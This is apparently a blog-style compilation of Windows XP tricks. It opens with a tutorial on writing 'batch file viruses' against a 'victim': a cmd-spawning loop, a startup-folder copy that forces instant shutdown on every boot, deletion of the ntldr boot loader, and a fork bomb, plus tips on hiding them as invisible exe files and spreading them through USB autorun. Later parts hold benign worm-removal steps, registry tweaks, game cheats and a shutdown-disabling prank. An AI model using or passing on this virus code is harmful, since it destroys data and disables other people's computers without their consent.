How to create Batch file viruses?

What are Batch Files ?

According to wikipedia a batch file is a text file containing a series of commands intended to be executed by the command interprete, In this article I will be telling you the basics of batch files clear and developing the approach towards coding your own viruses. Lets begin with a simple example ,


Open your command prompt and change your current directory to 'desktop' by typing 'cd desktop' without quotes.
Now type these commands one by one

1. md x //makes directory 'x' on desktop
2. cd x // changes current directory to 'x'
3. md y // makes a directory 'y' in directory 'x'

We first make a folder/directory 'x', then enter in folder 'x',then make a folder 'y' in folder 'x' .
Now delete the folder 'x'.
Lets do the same thing in an other way. Copy these three commands in notepad and save file as anything.bat



Now just double click on this batch file and the same work would be done , You will get a folder 'x' on your desktop and folder 'y' in it. This means the three commands executed line by line when we run the batch file

So a batch file is simply a text containing series of commands which are executed automatically line by line when the batch file is run.

What can batch viruses do ?

They can be used to delete the windows files, format data, steal information,consume CPU resources to affect performance,disable firewalls,open ports,modify or destroy registry and for many more purposes.

Now lets start with simple codes,

Note: Type 'help' in command prompt to know about some basic commands and to know about using a particular command , type 'command_name /?' without quotes.

1.

:x
start cmd.exe
goto x // infinite loop

This code will be opening command prompt screen infinite times , irritating victim and affecting performance.

2.  copy anything.bat “C:\Documents and Settings\Administrator\Start Menu\Programs\Startup”
copy anything.bat “C:\Documents and Settings\All Users\Start Menu\Programs\Startup” //these two commands will copy the batchfile in start up folders (in XP)
shutdown -s -t 00 //this will shutdown the computer in 0 seconds

Note : Files in Start up folder gets started automatically when windows starts .


Everytime the victim would start the computer, the batch file in start up would run and shutdown the computer immediately. You can remove this virus by booting the computer in Safe Mode and deleting the batch file from Start Up folder.

3. Goto C drive in Win XP , Tools->Folder Option->View
Now Uncheck the option 'Hide operating system files' and check option 'Show hidden files and folders'. Click apply

Now you can see the operating system files. There is a one file 'ntldr' which is boot loader used to boot the windows.



Lets make a batch file to  delete this file from victim's computer and the windows will not start then.
attrib -S -R -H C:\ntldr // -S,-R,-H to clear system file attribute, read only attribute , hidden file attribute respectively
del C:\ntldr //delete ntldr file

After ruuning this batch file , system will not reboot and a normal victim would definitely install the windows again.



4.%0|%0 //Its percentage zero pipe percentage zero

This code creates a large number of processes very quickly in order to saturate the process table of windows. It will just hang the windows This is actually known as 'fork bomb'.

The viruses we just coded -:

 

Note : Most of the batch viruses are simply undetectable by any anitiviruses
 
Tip : Coding good viruses just depends on the DOS commands you know and logic you use.

Limitations of Batch Viruses -:

1.Victim can easily read the commands by opening batch file in notepad.
2.The command prompt screen pops up,it alerts the victim and he can stop it.

To overcome these limitations,we need to convert these batch files into executable files that is exe files.

Download this Batch To Exe coverter from here.
http://www.mediafire.com/?uhsc5tfkd5dbn65
 
After running converter , open the batch file virus , Save as exe file , set visibility mode 'Invisible application' , than just click on compile button.

You can use other options as per your requirement.

Spreading batch viruses through pen drive -:

Step 1. 
 
Open notepad and write

[autorun]
open=anything.bat
Icon=anything.ico

Save file as ‘autorun.inf’

Step 2. Put this ‘autorun.inf’ and your actual batch virus ‘anything.bat’ in pendrive .

When the victim would plug in pen drive,the autorun.inf will launch anything.bat and commands in batch file virus would execute.

Remove REGSVR.EXE and New Folder.exe viruses

Plug a pendrive into a public computer and you will be pesked by the continuously replicating “New Folder.exe” virus or the “regsvr.exe” virus. Hear my story, while I transferred my notes last night (around 600 folders) and I was surprised to  see that around 450 MB of space was eaten by these self replicating space eaters ! I was running Linux so these were not a concern for me, but when I plugged my pendrive into my virtual machine (windows xp sp3), it caused multiple problems of explorer corruption and disabling registry tools.
Time for some virus busting I guess..here is how you can remove “regsvr.exe” and “new folder.exe” from your computer.

Step 1 - Some Startup Repairs
First of all, boot into safe mode.After you get to your desktop,press F3 or Ctrl + F and search for “autorun.inf” file in your computer and delete all the subsequent files. I case you are no able to delete them, select all the files and uncheck the”Read Only” option. If you are still not able to delete them , you might want to try out Unlocker tool to delete the files.
Now go to

start – > run –> type ”msconfig”
and press enter

Go to startup tab and uncheck “regsvr”, click ok and then click on “Exit without restart”.
Now go to

control panel –> scheduled tasks and delete “At1” task listed there.

Once done, close all windows.

Step 2 - Changing Configurations
Your registry might be disabled,and you need to activate it back to undo all the malicious changes done by worm.In order to do that, you need to go to

start – > run –> type ”gpedit.msc”
and press enter

then navigate to

users configuration –> Administrative templates –> systems

Find “prevent access to registry editing tools” , double click it and change the option to disable.

Once done, your Regedit will be enabled. In case your task manager is disabled, you need to enable it.

Step 3 - Registry Edits
Now we have to perform some registry edits to enable our explorer and to remove all instances of worm from the registry. Go to

start – > run –> type ”regedit”
and press enter

Click on Edit –> Find and search for regsvr.exe . Find and delete all the occurrences of regsvr.exe virus (don't delete  regsvr32.exe as its not a virus).
then navigate to entry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

and modify the entry

Shell = “Explorer.exe regsvr.exe”

to delete the regsvr.exe from it,so that it becomes

Shell = “Explorer.exe”

Once done, close all windows and get ready to delete all virus files.

Step 4 - Deleting Virus Files
The final step is to delete all the virus files in your computer. To do this, Press F3 or Ctrl + F and search for regsvr.exe (make sure to search in hidden folders ) and delete all “regsvr.exe” “svchost .exe” files (notice the gap between ‘svchost’ and ‘.exe’, keep in mind you don't delete the legitimate file.).
Clean your recycle bin and restart your PC (perform a cold boot).
Volia..you have cleaned your computer from regsvr..just make sure to scan your pendrive the next time you plug in :)

disable shut down

Hey dis is a cool trick u can play on ur friends
u can prevent people from shutting down their computer
jus go to Run type regedit.exe
Scroll Down to this path -
HKEY_CURRENT_USER\Software\Microsoft\Win dows\CurrentVersion\Policies\Explorer
create a new dword value named NoClose by clicking  Dword Value
Set its Value Data to 1 to disable the shut down option
Have fun

How to rename recycle bin

ou can rename recycle bin by following method:


1-Click Start menu > Run > and type “regedit” (without quotes), to run Windows Registry Editor
2- Find and go to following “HKEY_CLASSES_ROOT/CLSID/{645FF040-5081-101B-9F08-00AA002F954E}”
3- Change the name "Recycle Bin" to whatever you want

How to rename ‘My Computer’

In a large organization, it can sometimes be difficult for the administrator to know whose computer is whose. This little tweak will rename My Computer to “Computername” allowing you to easily see which computer you are logged on to.


Open the Registry Editor (You have to use REGEDT32.EXE) click Start, Run, and type “regedt32″ then click on OK to start the regedit utility.

Expand HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}

Rename the value named “LocalizedString” to “LocalizedString.orig”. Create a new REG_EXPAND_SZ

value named “LocalizedString”, and set the value to “%COMPUTERNAME%”.

Exit the registry editor, right click on your desktop and click Refresh. The My Computer icon should now be renamed to “Computername”.

Now one only has to glance at the desktop to see what computer they are on

XP/2000: How to Cheat at Freecell

Here’s how to make your freecell stats rock.


Freecell is an addictive solitaire game included in many versions of windows. It keeps tracks of your wins and loses.

If you want to pad your stats some, you can cheat for days.

During the game press…

CTRL + SHIFT + F10

This will bring up the cheat window.
Pressing Abort gives you a win.
Presing Retry gives you a loss.
Pressing Ignore aborts.

XP/2000 Freecell Bonus Games

Two extra freecell games to choose from.

Select ‘Game’ at the top left corner.

And hit ‘Select a game’.

A window will come up saying…

Select a game number 1 to 1000000.

At this point they expect you to type a positive numbr less than million ,but there are more.

Just type in -1 or -2 and you get bonus games.

They are impossible to beat ,but they pretty cool to look at how they are set up.

How to cheat Window XP 3D Pinball

You need Windows XP version for this to work.


There are four different ways to cheat at this Window’s game.

1. To get one extra ball.
type 1max.

2. To get unlimited balls.
type bmax.

3. Activate the Gravity Well.
type gmax.

4. To get a promotion of one rank.
type rmax.

A message will confirm all of the cheats except for #2 ,but that one you will notice after you loose a few balls

How to cheat at Solitaire

Just to get this out in the open… You can use this recipe in the middle of game at the begining or right before end, timing is not essencial for this cheat.

1. You must be playing Standard scorring or none.

2. Hold Shift+ Ctrl+ Alt and click on the deck.

3. The effect this will have is it will allow you to draw one card ,as apposed to three, whenever you click.

4. Enjoy.

XP/2000 Spider Solitaire Cheats

How to edit your score and streaks

1. Goto start menu and select run.
2. Type in regedit and hit ok.
3. Go to HKEY_CURRENT_USER .
a) look for Microsoft and than spider.
b) hit F3 and search for spider.
4. Look for the following
a) HighScore_(dificulty)=Set the value to set your high scores.
b) StreakCurrent_(dificulty), StreakLosses_(dificulty)and StreakWins_(dificulty)= Edit your streak records.
c) Wins(dificulty)= Edit your winning records.
d) Losses_(dificulty)= Edit your lossing records. (dificulty)

XP/2000: Minesweeper cheats

How to rule at this game.

*note will not work in Windows 95 or Windows NT.


Show mines

For this put your cursor inside the minesweeper window

Type XYZZY, than hit Shift+Enter, than Enter agian.

This will place a dot in the top left corner of the sceen.

To see where mines are put your cursor over a square…

If the dot is white that square is safe.

If the dot is black that square is a mine.

*note to see the dot the top left of your desktop must be visible

XP/2000: Cheat at Hearts.

how to see all cards at Microsoft Hearts.


1. Open start menu

2. Click run

3. Type regedit and hit ok

4. Look for Hkey_Current_User Software……Applets Hearts
(or hit F3 and look for hearts under applets)

Editors Note : Will be something similar to this where the dots are replaced by numbers…
HKEY_USERS\ ... \Software\Microsoft\Windows\CurrentVersion\Applets\Hearts

5. Right-click in the blank area on the right side and select new string value.

6. Title the new string ZB.

7. Right click on the string ZB you just made and hit modify.

8. In value data there should be a 0 , replace it with a 42.

9. Now when playing game, just press CTRL + ALT + SHIFT + F12,
and you will see all cards.

10. Enjoy.

XP/2000 Spider Solitaire Cheats

edit your wins/loses and winning streak.


How to edit your score and streaks

1. Goto start menu and select run.
2. Type in regedit and hit ok.
3. Go to HKEY_CURRENT_USER .
a) look for Microsoft and than spider.
b) hit F3 and search for spider.
4. Look for the following
a) HighScore_(dificulty)=Set the value to set your high scores.
b) StreakCurrent_(dificulty), StreakLosses_(dificulty)and StreakWins_(dificulty)= Edit your streak records.
c) Wins(dificulty)= Edit your winning records.
d) Losses_(dificulty)= Edit your lossing records. (dificulty)

games cheats

The only place for Windows game Cheats



Minesweeper


Secret - Reveal Mines

Instructions - Minimize or close all running applications. Launch Minesweeper, then type xyzzy. Next hold down either shift key for one second. Now when you move the mouse cursor over a Minesweeper square you will see a tiny white pixel in the top left corner of your desktop screen. This pixel will change to black when your mouse moves over a mine. You may need to change you desktop background to a solid color other then white or black to see the pixel.



Pinball


Secret - Extra Balls
Instructions - Type 1max at the start of a new ball to get extra balls.


Secret - Gravity Well
Instructions - Type gmax at the start of a new game to activate the Gravity Well.


Secret - Instant Promotion
Instructions - Type rmax at the start of a new game to go up in ranks.


Secret - Skill Shot
Instructions - Launch the ball partially up the chute past the third yellow light bar so it falls back down to get 75,000 points. There are six yellow light bars that are worth a varying amount of points:

First: 15,000 points
Second: 30,000 points
Third: 75,000 points
Fourth: 30,000 points
Fifth: 15,000 points
Sixth: 7,500 points


Secret - Test Mode
Instructions - Type hidden test at the start of a new ball to activate Test Mode. No notification will be given that this is activated but you can now left-click the mouse button and drag the ball around.


Secret - Unlimited Balls
Instructions - Type bmax at the start of a new ball. No notification will be given that this is activated but when a ball is lost a new ball will appear from the yellow wormhole indefinitely. Once this is activated you will be unable to activate other secrets without restarting




FreeCell


Secret - Instant Win
Instructions - Hold down Ctrl + Shift + F10 during game play. Then you will be asked if you want to Abort, Retry or Ignore. Choose Abort, then move any card to instantly win.


Secret - Hidden Game Modes
Instructions - In the "Game" menu choose "Select Game". Enter -1 or -2 to activate the hidden game modes.



Solitaire


Secret - Instant Win


Instructions - Press Alt + Shift + 2 during game play to instantly win.


Secret - Draw single cards in a Draw Three game


Instructions - Hold down CTRL + ALT + SHIFT while drawing a new card. Instead of drawing three cards you will only draw one.


Infinite Points


In the Windows XP version of solitaire, draw from the deck at least twice. Hold control and drag a card down from the deck. Click the "A" key and then let go of the left mouse key. You will get 10 points for this. Continue doing this for infinite points!

Infinite points trick II


To do this trick, finish a game of solitaire with the time bonus option on. The cards will start bouncing. Click on the solitaire screen and the play again box will pop up. Select no, so the solitaire screen is just blank green. Use the instant win cheat (Alt+Shift+2) and you will recieve the time bonus you got last game will be added to your last game's score. For example, if your time bonus was 5000, and your final score was 6000, after using this glitch, you will have a score of 11000. This glitch can be used as many times as you want.



//-----------------------------------------------------------------
// registry hack which will allow you to see your opponents' cards
//----------------------------------------------------------------- Launch REGEDIT.EXE and navigate to HKEY_CURRENT_USER Software Microsoft Windows CurrentVersion Applets Hearts. NOTE: You may have to create the Hearts key under Applets In the right-hand pane, create a new String Value. Immediately rename it to "ZB" (without the quotes); give it a value of "42" (again, sans quotes). The next time you're in a game of Hearts, press CTRL + SHIFT + ALT + F12.

registry file

How to display a legal notice on startup
This is how to make a legal notice appear on startup:

Open Regedit

Navigate to "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system"

legalnoticecaption:"enter your notice caption here"

legalnoticetext:"enter your legal notice text here"


Add admin user to welcome screen:
Start the Registry Editor Go to:

HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon \ SpecialAccounts \ UserList \

Right-click an empty space in the right pane and select New > DWORD Value Name the new value Administrator. Double-click this new value, and enter 1 as it's Value data. Close the registry editor and restart.



Kill Processes immediately:
When logging off, you sometimes get an “End Task” dialog prompt, indicating a program that doesn’t shut itself down. You can suppress the prompts and have Windows kill these programs automatically when you log off. In regedit, find key HKEY_CURRENT_USER\Control Panel\Desktop Look for the value AutoEndTasks, and change it from 0 to 1.



No Shutdown:
Wanna play with your friends by removing the shutdown option from start menu in their computer.
Regedit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
"NoClose"="DWORD:1"


Show Superhidden Files:
Even if you turn on show hidden files in Windows Explorer some files will remain hidden. These files are super hidden. Set the registry value below to 1.

LogIn to Yahoo messenger with multiple Id's

You can log in with multiple id’s on the same yahoo messenger .You need not to download any new software for this, all you have to do is

Follow these steps -

Go to Start —-> Run . Type ''regedit'' and then press enter .

2.Navigate to HKEY_CURRENT_USER ——–> Software ——>yahoo —->pager—>Test

3.On the right pane , right-click and choose new Dword value .

4.Rename it as Plural.

5.Double click and assign a decimal value of 1.

That's it now your done close the registry and now you can log in into Yahoo messenger with multiple Id's.

If your registry is disabled then you have to Enable it

If you have any problem ask me i will help you